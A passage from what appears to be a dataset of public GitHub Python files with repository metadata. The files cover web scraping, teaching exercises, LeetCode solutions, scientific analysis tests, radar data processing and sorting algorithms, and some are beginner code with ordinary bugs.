tag\n a_tag = td.find('a', class_='bubblelink code')\n if a_tag:\n # extract the text content of the tag and append it to the list\n course_code = a_tag.text.strip()\n course_code = course_code.replace(\"\\xa0\", \" \")\n\n if \"/\" in course_code:\n # split the string into two parts\n parts = course_code.split(\" \")\n\n # split the first part into multiple parts based on \"/\"\n nums = parts[0].split(\"/\")\n major_codes = []\n for num in nums:\n # get the major code and modify the course code\n subject= num.replace(num, \"\").strip(\"/\")\n course_code = num.replace(\"/\", \" \") + \" \" + parts[1]\n \n course_code = subject + \" \" + course_code\n course_code = course_code.lstrip()\n\n # append the major code and course code to the list\n print(course_code)\n major_requirements.append([degree_acronym, major, course_code])\n # print the resulting major codes and course codes\n\n else:\n # print the input string without modification\n print(course_code)\n major_requirements.append([degree_acronym, major, course_code])\n\n print()\n\n print\n# Connect to the SQLite database\n\nmajor_requirements = [list(t) for t in set(tuple(lst) for lst in major_requirements)]\nconn = sqlite3.connect('class_information.db')\n\nheaders = ['Degree','Major','Course']\nmajor_requirements_df = pd.DataFrame(major_requirements, columns=headers)\n\n\n# Write the dataframe to an SQLite table\nmajor_requirements_df.to_sql('major_requirements', conn, if_exists='replace', index=True)\n\n# Close the database connection\nconn.close()","repo_name":"SamoanJohn/Schedule-Conflict-Checker","sub_path":"Major_Requirements_Scraping.py","file_name":"Major_Requirements_Scraping.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37158278662","text":"\"\"\"\nclass 声明类的名字\n类名的首字母必须大写\n面向对象编程,这里的对象指的就是类\n类里面的所有方法,都必须要传一个参数,叫self\n封装、继承、重写/多态\n\"\"\"\n\nclass Girlfreind(object): #object:祖师爷类,没有要继承的类,该类是默认值,_init_就是继承object的方法的\n \"\"\"\n 女朋友\n \"\"\"\n def __init__(self,sex,high,age,weight,hair):\n \"\"\"\n 基本信息\n \"\"\"\n self.sex=sex\n self.high=high\n self.age=age\n self.weight=weight\n self.hair=hair\n def skill(self,num):\n \"\"\"\n 个人技能\n \"\"\"\n print(\"你性别为\"+self.sex+\"身高\"+self.high+\"年龄\"+self.age+\",\"+\"体重\"+self.weight+\",\"+\"留着\"+self.hair+\"的女朋友开始了\")\n if num==1:\n print(\"胸口碎大石\")\n elif num==1:\n print(\"拳击\")\n else:\n print(\"吉他\")\n\n def cooking(self):\n \"\"\"\n 厨艺\n \"\"\"\n print(\"你性别为\"+self.sex+\"身高\"+self.high+\"年龄\"+self.age+\",\"+\"体重\"+self.weight+\",\"+\"留着\"+self.hair+\"的女朋友开始了\")\n print(\"八大菜系,样样精通\")\n\n def work(self):\n \"\"\"\n 工作\n \"\"\"\n print(\"软件测试工程师\")\n\n#类的实例化/实例化对象\n# Essilia=Girlfreind(\"女\",\"160cm\",\"18岁\",\"45kg\",\"黑色短发\")\n# Essilia.work()\n# print(Essilia.sex)\n# Essilia.skill(1)\n\nclass girlfriend(Girlfreind): #继承\n pass #pass是占位符\nzhangsan=girlfriend(\"女\",\"180cm\",\"18岁\",\"60kg\",\"黑色短发\")\nzhangsan.cooking()\n\nclass boyfriend(Girlfreind): #重写\n def cooking(self):\n print(\"全能泡面王\") \nzhangsan=boyfriend(\"男\",\"180cm\",\"18岁\",\"60kg\",\"黑色短发\")\nzhangsan.cooking()\n\n\n","repo_name":"Essilia/Python-Practice","sub_path":"demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19739692025","text":"# Calculate Gross Pay\r\n# Sigrid Olive\r\n# 6/6\r\n\r\nprint ('This program calculates gross pay.')\r\n\r\n#input the hourly wage\r\nwage = int(input('Hourly wage? '))\r\n\r\n#input hours worked\r\nhours = input ('Hours worked?')\r\nhours = input(hours)\r\n\r\n#calculate gross pay\r\ngrossPay = wage * hours\r\n\r\n#output gross pay\r\nprint ('Your gross pay is:'), grossPay\r\n\r\n# input the hourly wage\r\nwage - float(input ('Hourly wage? '))\r\n\r\n#input hours worked\r\n# (this works the same as the nested version)\r\nhours = input ('Hours worked? ')\r\nhours = int (hours)\r\n\r\n#calculate gross pay\r\ngrossPay = wage * hours\r\n\r\n#output gross pay\r\nprint ('Your gross pay is: ', grossPay)\r\n\r\n","repo_name":"olives8109/CTI-110-1001","sub_path":"m2_grosspayfloat.py","file_name":"m2_grosspayfloat.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4907443597","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 12 23:56:34 2019\n\n@author: wangjingyi\n\"\"\"\n\nimport numpy as np\nimport time\nfrom random import choice \nimport pandas as pd\nimport os\n\n#定义计算共同邻居指标的方法\n#define some functions to calculate some baseline index\ndef Cn(MatrixAdjacency):\n Matrix_similarity = np.dot(MatrixAdjacency,MatrixAdjacency)\n return Matrix_similarity\n\n#计算Jaccard相似性指标\ndef Jaccavrd(MatrixAdjacency_Train):\n Matrix_similarity = np.dot(MatrixAdjacency_Train,MatrixAdjacency_Train)\n deg_row = sum(MatrixAdjacency_Train)\n deg_row.shape = (deg_row.shape[0],1)\n deg_row_T = deg_row.T\n tempdeg = deg_row + deg_row_T\n temp = tempdeg - Matrix_similarity\n Matrix_similarity = Matrix_similarity / temp\n return Matrix_similarity\n\n#定义计算Salton指标的方法\ndef Salton_Cal(MatrixAdjacency_Train):\n similarity = np.dot(MatrixAdjacency_Train,MatrixAdjacency_Train)\n deg_row = sum(MatrixAdjacency_Train)\n deg_row.shape = (deg_row.shape[0],1)\n deg_row_T = deg_row.T\n tempdeg = np.dot(deg_row,deg_row_T)\n temp = np.sqrt(tempdeg)\n np.seterr(divide='ignore', invalid='ignore')\n Matrix_similarity = np.nan_to_num(similarity / temp)\n print(np.isnan(Matrix_similarity))\n Matrix_similarity = np.nan_to_num(Matrix_similarity)\n print(np.isnan(Matrix_similarity))\n return Matrix_similarity\n\n#定义计算Katz1指标的方法\ndef Katz_Cal(MatrixAdjacency):\n #α取值\n Parameter = 0.01\n Matrix_EYE = np.eye(MatrixAdjacency.shape[0])\n Temp = Matrix_EYE - MatrixAdjacency * Parameter\n Matrix_similarity = np.linalg.inv(Temp)\n Matrix_similarity = Matrix_similarity - Matrix_EYE\n return Matrix_similarity\n\n#定义计算局部路径LP相似性指标的方法\ndef LP_Cal(MatrixAdjacency):\n Matrix_similarity = np.dot(MatrixAdjacency,MatrixAdjacency)\n Parameter = 0.05\n Matrix_LP = np.dot(np.dot(MatrixAdjacency,MatrixAdjacency),MatrixAdjacency) * Parameter\n Matrix_similarity = np.dot(Matrix_similarity,Matrix_LP)\n return Matrix_similarity\n \n#计算资源分配(Resource Allocation)相似性指标\ndef RA(MatrixAdjacency_Train):\n RA_Train = sum(MatrixAdjacency_Train)\n RA_Train.shape = (RA_Train.shape[0],1)\n MatrixAdjacency_Train_Log = MatrixAdjacency_Train / RA_Train\n MatrixAdjacency_Train_Log = np.nan_to_num(MatrixAdjacency_Train_Log)\n Matrix_similarity = np.dot(MatrixAdjacency_Train,MatrixAdjacency_Train_Log)\n return Matrix_similarity\n\n#仿真随机环境一:针对活跃性的节点对\ndef RandomEnviromentForActive(MatrixAdjacency,i,j):\n Index = np.random.randint(1, 5)\n print(Index)\n global IndexName\n if Index == 1:\n IndexName = '相似性指标是:Jaccard Index'\n print(IndexName)\n similarity_matrix = Jaccavrd(MatrixAdjacency)\n similarity = similarity_matrix[i,j]\n elif Index == 2:\n IndexName = '相似性指标是:Salton Index'\n print(IndexName)\n similarity_matrix = Salton_Cal(MatrixAdjacency)\n similarity = similarity_matrix[i,j]\n elif Index == 3:\n IndexName = '相似性指标是:Katz Index'\n print(IndexName)\n similarity_matrix = Katz_Cal(MatrixAdjacency)\n similarity = similarity_matrix[i,j]\n else:\n IndexName = '相似性指标是:RA Index'\n print(IndexName)\n similarity_matrix = RA(MatrixAdjacency)\n similarity = similarity_matrix[i,j]\n return similarity \n \n#随机环境二:主要针对非活跃性的节点对\ndef RandomEnviromentForNonActive():\n\n Action = np.random.randint(1, 4)\n if Action == 1:\n ActionName = 'ID3'\n similarity_matrix = ID3_Cal(MatrixAdjacency)\n #similarity = similarity_matrix[i,j]\n elif Action == 2:\n ActionName = 'CART'\n similarity_matrix = Cart_Cal(MatrixAdjacency)\n #similarity = similarity_matrix[i,j]\n elif Action == 3:\n ActionName = 'C4.5'\n similarity_matrix = C4_Cal(MatrixAdjacency)\n #similarity = similarity_matrix[i,j]\n return similarity\n\n#构建学习自动机的智能体(To Construct the agent)\ndef ContructionAgent(filepath,n1,n2):\n f = open(filepath)\n lines = f.readlines()\n A = np.zeros((50, 50), dtype=float)\n A_row = 0\n for line in lines:\n list = line.strip('\\n').split(' ')\n A[A_row:] = list[0:50]\n A_row += 1\n \n # 初始化p1和p2\n a = 0.05\n b = 0.01\n p1 =0.5\n p2 =0.5\n Action = 1\n # 在这里使用数字1代表选择动作‘Yes’,用2代表动作‘No’\n for i in range(1):\n \n # global Action\n # 相似性阈值(the threashhold_value of similarity)\n if (p1 >= p2):\n Action = 1\n else:\n Action = 2\n print('选择的动作是:' + str(Action))\n threshhold_value = 0.3\n similarity = RandomEnviromentForActive(A, n1, n2)\n # p1表示动作1'Yes'被选择的概率,p2表示动作2'No'被选择的概率\n # 前一次选择的动作是‘Yes’,并且该动作得到了奖励\n if (similarity > threshhold_value) and (Action == 1):\n p1 = p1 + a * (1 - p1)\n p2 = 1-p1\n # p2 = (1 - a) * p2\n # 前一次选择的动作是'No',并且该动作得到了奖励\n elif (similarity < threshhold_value) and (Action == 2):\n p2 = (1-a)*p2\n p1 = 1-p2\n # p1 = (1 - a) * p1\n # 前一次选择的动作是‘Yes’,但该动作得到了惩罚\n elif (similarity < threshhold_value) and (Action == 1):\n p2 = 1-b*p2\n p1 = 1-p2\n #p2 = 1 - b * p2\n \n # 前一次选择的动作是‘No’,但该动作得到了惩罚\n elif (similarity > threshhold_value) and (Action == 2):\n p1 = b + (1 - b) * (1 - p1)\n p2 = 1-p1\n # p1 = 1 - b * p1\n \n if (p1 >= p2):\n print('下一时刻选择的动作是:Yes')\n else:\n print('下一时刻选择的动作是:No')\n return p1, p2\n\n\n#测试主程序\npath=r'../Data/itcmatrixs/36000/'\nresult = np.zeros((50, 50))\nfor i in os.walk(path):\n for m in range(50):\n for n in range(50):\n r = None\n for j in range(26):\n datapath = path+i[2][j]\n p1,p2 = ContructionAgent(datapath,m,n)\n r = int(p1>=p2)\n result[m,n] = r;\nr.save('result.npy') \npass\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"SintolRTOS/Learning_Automata","sub_path":"learning_automata.py","file_name":"learning_automata.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12785105907","text":"import scrapy\nimport json\n\n\nclass DevtosSpider(scrapy.Spider):\n\n url_list = ['https://dev.to/search/feed_content?per_page=100&page=' +\n str(i) for i in range(10)]\n name = \"devto\"\n start_urls = url_list\n\n def parse(self, response):\n data = json.loads(response.text)\n\n dev_list = [i for i in data['result']]\n\n for i in range(len(dev_list)):\n yield {\n 'title': dev_list[i]['title'],\n 'author': dev_list[i]['user']['name'],\n 'tag_list': dev_list[i]['tag_list'],\n 'date': dev_list[i]['readable_publish_date'],\n 'reading_time': dev_list[i]['reading_time']\n }\n","repo_name":"dklarin/scrap-dev.to","sub_path":"dev_scraps.py","file_name":"dev_scraps.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70292392169","text":"import socket\n\nHOST = \"localhost\"\nPORT = 50000\nBUFF_SIZE = 4096\n\n# create socket\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ntry:\n # request information to server\n client.sendto(b\"Hi!\", (HOST, PORT))\n\n # receive message from server\n data = client.recv(BUFF_SIZE)\n print(data.decode(\"UTF-8\"))\n\nfinally:\n # close connection\n client.close()\n","repo_name":"akitanak/tcpip_socket_programming_by_python","sub_path":"src/chapter02/client0udp.py","file_name":"client0udp.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26976660896","text":"from yahoo_fin import stock_info as si\nfrom datetime import datetime, timedelta, date\nimport pandas as pd\n\ndef tabla_div():\n df = pd.read_csv('tickers.csv', header=None, encoding='utf-8')\n tickers = df[0].to_list()\n df = pd.DataFrame()\n cont= 0\n for ticker in tickers:\n try:\n one_day = timedelta(days=600)\n first_day_of_the_month = date.today().replace(day=1)\n fecha_de_inicio = first_day_of_the_month - one_day\n aux_div = si.get_dividends(ticker, start_date=fecha_de_inicio)\n\n df2 = pd.DataFrame(index=aux_div.index.astype(str).to_list(), data=aux_div['dividend'].tolist(),\n columns=[ticker])\n df= pd.concat([df2,df],axis=0)\n df = df.sort_index(ascending=False)\n cont = cont +1\n\n except Exception as error:\n print(str(error))\n print(ticker)\n continue\n df.to_csv('resultados_dividendos.csv', index = True)\n\nif __name__ == '__main__':\n tabla_div()","repo_name":"al118345/Analisis_Financiero","sub_path":"obtener_historico_dividendos/historico_dividendos.py","file_name":"historico_dividendos.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36194809432","text":"'''\nполучает 2 числа, а выводит все числа на отрезки, которые деляться на кажэдую из своих цифр\n'''\nk = 0\na = int(input())\nb = int(input())\nfor i in range(a,b):\n k = 0\n i = str(i)\n for ex in range(len(i)): # проверка числа\n ex = int(i[ex])\n i = int(i)\n if ex != 0 and i % ex == 0:\n k += 1\n i = str(i)\n if k == len(i):\n print(int(i))\n ","repo_name":"Spaklak/InformaticsSolve","sub_path":"казанин1.py","file_name":"казанин1.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7178255519","text":"import math\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n pos = math.inf\n \n maxSellPrice = 0\n \n for i in prices:\n if i < pos:\n pos = i\n if i-pos > maxSellPrice:\n maxSellPrice = i-pos\n \n return maxSellPrice","repo_name":"mmkvdev/leetcode","sub_path":"September/Week3/Day4/Submissions/py/besttimetoSellStock.py","file_name":"besttimetoSellStock.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17888017187","text":"import pytest\nimport shutil\nfrom pathlib import Path\nfrom spikeinterface.core import WaveformExtractor, extract_waveforms, load_extractor\nfrom spikeinterface.core.testing import check_recordings_equal\nfrom spikeinterface.comparison import (\n create_hybrid_units_recording,\n create_hybrid_spikes_recording,\n generate_injected_sorting,\n)\nfrom spikeinterface.extractors import toy_example\nfrom spikeinterface.preprocessing import bandpass_filter\n\n\nif hasattr(pytest, \"global_test_folder\"):\n cache_folder = pytest.global_test_folder / \"comparison\" / \"hybrid\"\nelse:\n cache_folder = Path(\"cache_folder\") / \"comparison\" / \"hybrid\"\n\n\ndef setup_module():\n if cache_folder.is_dir():\n shutil.rmtree(cache_folder)\n cache_folder.mkdir(parents=True, exist_ok=True)\n recording, sorting = toy_example(\n duration=60, num_channels=4, num_units=5, num_segments=2, average_peak_amplitude=-1000\n )\n recording = bandpass_filter(recording, freq_min=300, freq_max=6000)\n recording = recording.save(folder=cache_folder / \"recording\")\n sorting = sorting.save(folder=cache_folder / \"sorting\")\n\n wvf_extractor = extract_waveforms(\n recording, sorting, folder=cache_folder / \"wvf_extractor\", ms_before=10.0, ms_after=10.0\n )\n\n\ndef test_hybrid_units_recording():\n wvf_extractor = WaveformExtractor.load(cache_folder / \"wvf_extractor\")\n recording = wvf_extractor.recording\n templates = wvf_extractor.get_all_templates()\n templates[:, 0, :] = 0\n templates[:, -1, :] = 0\n hybrid_units_recording = create_hybrid_units_recording(\n recording, templates, nbefore=wvf_extractor.nbefore, injected_sorting_folder=cache_folder / \"injected0\"\n )\n\n assert hybrid_units_recording.get_traces(end_frame=600, segment_index=0).shape == (600, 4)\n assert hybrid_units_recording.get_traces(start_frame=100, end_frame=600, segment_index=1).shape == (500, 4)\n assert hybrid_units_recording.get_traces(start_frame=recording.get_num_frames(0) - 200, segment_index=0).shape == (\n 200,\n 4,\n )\n\n # Check dumpability\n saved_loaded = load_extractor(hybrid_units_recording.to_dict())\n check_recordings_equal(hybrid_units_recording, saved_loaded, return_scaled=False)\n\n saved_1job = hybrid_units_recording.save(folder=cache_folder / \"units_1job\")\n saved_2job = hybrid_units_recording.save(folder=cache_folder / \"units_2job\", n_jobs=2, chunk_duration=\"1s\")\n check_recordings_equal(hybrid_units_recording, saved_1job, return_scaled=False)\n check_recordings_equal(hybrid_units_recording, saved_2job, return_scaled=False)\n\n\ndef test_hybrid_spikes_recording():\n wvf_extractor = WaveformExtractor.load_from_folder(cache_folder / \"wvf_extractor\")\n recording = wvf_extractor.recording\n sorting = wvf_extractor.sorting\n hybrid_spikes_recording = create_hybrid_spikes_recording(\n wvf_extractor, injected_sorting_folder=cache_folder / \"injected1\"\n )\n hybrid_spikes_recording = create_hybrid_spikes_recording(\n wvf_extractor, unit_ids=sorting.unit_ids[:3], injected_sorting_folder=cache_folder / \"injected2\"\n )\n\n assert hybrid_spikes_recording.get_traces(end_frame=600, segment_index=0).shape == (600, 4)\n assert hybrid_spikes_recording.get_traces(start_frame=100, end_frame=600, segment_index=1).shape == (500, 4)\n assert hybrid_spikes_recording.get_traces(start_frame=recording.get_num_frames(0) - 200, segment_index=0).shape == (\n 200,\n 4,\n )\n\n # Check dumpability\n saved_loaded = load_extractor(hybrid_spikes_recording.to_dict())\n check_recordings_equal(hybrid_spikes_recording, saved_loaded, return_scaled=False)\n\n saved_1job = hybrid_spikes_recording.save(folder=cache_folder / \"spikes_1job\")\n saved_2job = hybrid_spikes_recording.save(folder=cache_folder / \"spikes_2job\", n_jobs=2, chunk_duration=\"1s\")\n check_recordings_equal(hybrid_spikes_recording, saved_1job, return_scaled=False)\n check_recordings_equal(hybrid_spikes_recording, saved_2job, return_scaled=False)\n\n\ndef test_generate_injected_sorting():\n recording = load_extractor(cache_folder / \"recording\")\n sorting = load_extractor(cache_folder / \"sorting\")\n injected_sorting = generate_injected_sorting(\n sorting, [recording.get_num_frames(seg_index) for seg_index in range(recording.get_num_segments())]\n )\n\n\nif __name__ == \"__main__\":\n setup_module()\n test_generate_injected_sorting()\n test_hybrid_units_recording()\n test_hybrid_spikes_recording()\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/comparison/tests/test_hybrid.py","file_name":"test_hybrid.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"11598896612","text":"import os\nfrom pyart.core.transforms import antenna_to_cartesian\nfrom .radarpolar_data import readRadarPolar, radarPolarTimeInfo\n\n\ndef create_qvp_data(dirMDV, source, time, fields, desired_angle, time_zone):\n if source is None:\n dirDate = dirMDV\n else:\n dirDate = os.path.join(dirMDV, source)\n\n radar = readRadarPolar(dirDate, time, fields)\n if radar is None:\n return {}\n\n index = abs(radar.fixed_angle[\"data\"] - desired_angle).argmin()\n radar_range = radar.range[\"data\"] / 1000.0\n radar_angle = radar.fixed_angle[\"data\"][index]\n _, _, height = antenna_to_cartesian(radar_range, 0.0, radar_angle)\n\n data = dict()\n for field in fields:\n data[field] = radar.get_field(index, field).mean(axis=0)\n\n infoT = radarPolarTimeInfo(radar, time_zone)\n\n return {\n \"time\": infoT[\"format\"],\n \"elevation\": radar_angle,\n \"height\": height,\n \"data\": data,\n }\n","repo_name":"rijaf-iri/mtorwaradar","sub_path":"mtorwaradar/api/create_qvp.py","file_name":"create_qvp.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25198366562","text":"class Solution:\n def myAtoi(self, s: str) -> int:\n MAX_VAL, MIN_VAL = 2**31-1, -(2**31)\n res, index = 0, 0\n stripped = s.strip()\n if len(stripped) == 0:\n return 0\n firstChar = stripped[0]\n sign = -1 if firstChar == \"-\" else 1\n if firstChar == \"-\" or firstChar == \"+\":\n index = 1\n while index < len(stripped) and stripped[index].isdigit():\n nextDigit = int(stripped[index])\n if res > MAX_VAL // 10 or (res == MAX_VAL // 10 and nextDigit > 7):\n return MAX_VAL if sign == 1 else MIN_VAL\n res = res * 10 + int(stripped[index])\n index += 1\n return res * sign\n","repo_name":"Reflectrr/leetcode","sub_path":"8.string_to_integer_atoi.py","file_name":"8.string_to_integer_atoi.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2128173260","text":"#!/usr/bin/env python\n\nimport os\nimport pwd\nimport sys\nimport time\nimport file_paths_config as paths\nfrom glob import glob\nfrom Pegasus.DAX3 import *\n\n# The name of the DAX file is the first argument\nif len(sys.argv) != 2:\n sys.stderr.write(\"Usage: %s DAXFILE\\n\" % (sys.argv[0]))\n sys.exit(1)\ndaxfile = sys.argv[1]\n\nUSER = pwd.getpwuid(os.getuid())[0]\n\n# Create a abstract dag\ndax = ADAG(\"process\")\n\n# Add some workflow-level metadata\ndax.metadata(\"creator\", \"%s@%s\" % (USER, os.uname()[1]))\ndax.metadata(\"created\", time.ctime())\n\n#path_to_data = paths.file_paths['data'].replace('*','')\npath_list = glob(paths.file_paths['data'])\npath_list_index = paths.file_paths['data'].split('/').index('*')\n\nfor path in sorted(path_list):\n\tplant_folder_name = path.split('/')[path_list_index]\n\tpreprocess = Job(\"zip\")\n\tzip_file_name = plant_folder_name + \".zip\"\n\tpreprocess.addArguments(path, plant_folder_name)\n\tzip_file = File(zip_file_name)\n\tpreprocess.uses(zip_file, link=Link.OUTPUT, transfer=True, register=False)\n\tdax.addJob(preprocess)\n\nf = open(daxfile, \"w\")\ndax.writeXML(f)\nf.close()\n","repo_name":"cseseniordesign/plant-phenotyping","sub_path":"compressDatasetWorkflow/daxgen.py","file_name":"daxgen.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15034545778","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics import mean_squared_error\nimport A2\n\ndef main():\n \"\"\"Main function to run when running the script.\"\"\"\n data = np.loadtxt(\"A2_datasets_2022/GPUbenchmark.csv\", delimiter=\",\")\n X = data[:, :-1]\n y = data[:, -1]\n\n for use_cross in [False, True]:\n print(f\"Cross validation inside the algorithm? {use_cross}\")\n models = A2.forward_selection(X, y, cross_val=use_cross, as_indexes=False)\n lr = LinearRegression()\n cross_mses = []\n for fs in range(1, len(models) + 1):\n m = models[:fs] - 1\n y_pred = cross_val_predict(lr, X[:, m], y, cv=3)\n mse = mean_squared_error(y, y_pred)\n cross_mses.append(mse)\n print(f\"{len(m)} feature(s) model MSE: {mse}\")\n cross_mses = np.array(cross_mses)\n print(f\"Best model: {models[:cross_mses.argmin() + 1]}\")\n print(f\"Most important feature: {models[0]}\")\n print(\"\\n-----------------------------------------\\n\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"oenstrom/2DV516_A2","sub_path":"exercise6.py","file_name":"exercise6.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30423285269","text":"from asyncio.windows_events import NULL\r\nfrom numpy import rint\r\nimport pandas as pd\r\nfrom flask.json import dump, load\r\nfrom itertools import chain\r\n\r\n\r\npersona = pd.read_csv(\".\\data.csv\")\r\n\r\n\r\nregistros = pd.read_csv(\"..\\datos_registro.csv\")\r\n\r\n\r\ndef get_data():\r\n return persona\r\n\r\ndef guardar_datos(data):\r\n df = pd.DataFrame(data)\r\n df.to_csv(\".\\datos_registro.csv\",index=False,mode=\"a\",header=False, na_rep=\"\\n\")\r\n\r\ndef get_registro():\r\n return pd.read_csv(\"..\\datos_registro.csv\")\r\n\r\ndef get_ind():\r\n data = get_registro()\r\n indigenas = data[data[\"Etnia\"].str.contains(\"Indigena\")]\r\n return indigenas\r\n\r\ndef get_afro():\r\n data = get_registro()\r\n afroecuatorianos = data[data[\"Etnia\"].str.contains(\"Afroecuatoriano\")]\r\n return afroecuatorianos\r\n\r\ndef get_mez():\r\n data = get_registro()\r\n meztizo = data[data[\"Etnia\"].str.contains(\"Meztizo\")]\r\n return meztizo\r\n\r\ndef get_eur():\r\n data = get_registro()\r\n eurodesendiente =data[data[\"Etnia\"].str.contains(\"EuroDesendiente\")]\r\n return eurodesendiente\r\n\r\nindigena = get_ind()\r\n\r\nnew_df = indigena.groupby(indigena[\"ID\"])\r\nfor group in new_df:\r\n # df = pd.DataFrame(lista, columns=['ID', 'ETNIA','A', 'E','I'])\r\n valor=str(group[1])\r\n valor = \" \".join(valor.split())\r\n lista = valor.split(\" \")\r\n lista = lista[5:]\r\n matriz = []\r\n vec = []\r\n for i in range(len(lista)):\r\n if i % 6 == 0:\r\n matriz.append(vec)\r\n vec=[]\r\n vec.append(lista[i])\r\n # vec=[]\r\n # if i > 7:\r\n # if i % 7 == 0:\r\n # matriz.append(vec)\r\n # vec=[]\r\n # vec.append(lista[i])\r\n \r\n if vec != []:\r\n matriz.append(vec)\r\n matriz.pop(0)\r\n print(matriz)\r\n\r\n # # df = list(chain.from_iterable(matriz))\r\n # df = pd.DataFrame(matriz)\r\n # print(df)\r\n # print(df[2].mean())\r\n print(\"######################\")\r\n","repo_name":"rebecau/Figshare","sub_path":"controllers/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70734994407","text":"# Write a function called merge_sort that sorts a list of integers using the merge sort algorithm.\n\n\ndef merge(array1, array2):\n combined = []\n i = 0 \n j = 0\n\n while i < len(array1) and j < len(array2):\n if array1[i] < array2[j]:\n combined.append(array1[i])\n i +=1\n else:\n combined.append(array2[j])\n j +=1\n while i < len(array1):\n combined.append(array1[i])\n i +=1\n while j < len(array2):\n combined.append(array2[j])\n j +=1\n\n return combined\n\n\n\ndef merge_sort(my_list):\n # if the list contains only one element, it is already sorted\n if len(my_list) == 1:\n return my_list\n \n # find the midpoint/middle index of the list using integer division by 2\n mid_index = int(len(my_list)/2)\n\n # recursively call the merge_sort function to sort the left and right halves of the list\n left = merge_sort(my_list[:mid_index]) # created by slicing my_list using mid_index\n right = merge_sort(my_list[mid_index:])\n\n # Call the previously implemented merge function to combine the sorted left and right halves into a single sorted list\n # Or merge the sorted left and right halves of the list\n return merge(left, right)\n\n\n\n\n# print(merge([1,2,7,8], [3,4,5,6]))\noriginal_list = [3,1,4,2]\n\nsorted_list = merge_sort(original_list)\n\nprint('Original List:', original_list)\n\nprint('\\nSorted List:', sorted_list)\n\n# Merge Sort is a divide-and-conquer algorithm for sorting a list numbers.","repo_name":"hirak-saharia/DSA_Using_Python","sub_path":"Merge_Sort/Merge_Sort.py","file_name":"Merge_Sort.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71591301609","text":"import logging\nimport requests\nimport re\nimport pandas as pd\nimport datetime\nfrom bs4 import BeautifulSoup\nimport os\nimport glob\n\n# Configure logging settings\nlog_format = \"%(asctime)s [%(levelname)s] - %(message)s\"\nlogging.basicConfig(\n level=logging.INFO, filename=\"data_extraction.log\", filemode=\"a\", format=log_format\n)\n\n# Define file paths and URLs\nkml_path = \"https://onemotoring.lta.gov.sg/mapapp/kml/erp-kml/erp-kml-0.kml\"\nlink = \"https://datamall.lta.gov.sg/mapapp/pages/ddls/1_ddl.html\"\ndata_directory = \"data\" # Directory to store data files\ntoll_pattern = \"toll-rates\"\nmarkers_pattern = \"markers\"\n\ndef extract_plaza_info_from_kml(kml_path):\n \"\"\"\n Extract data from a KML file and perform preprocessing.\n\n Args: \n kml_path (str): URL to the KML file.\n\n Returns:\n pandas.DataFrame: Extracted and processed data.\n \"\"\"\n try:\n logging.info(\"Fetching data from KML file.\")\n response = requests.get(kml_path)\n response.raise_for_status()\n\n data = response.text\n name_pattern = r\"([^<]+)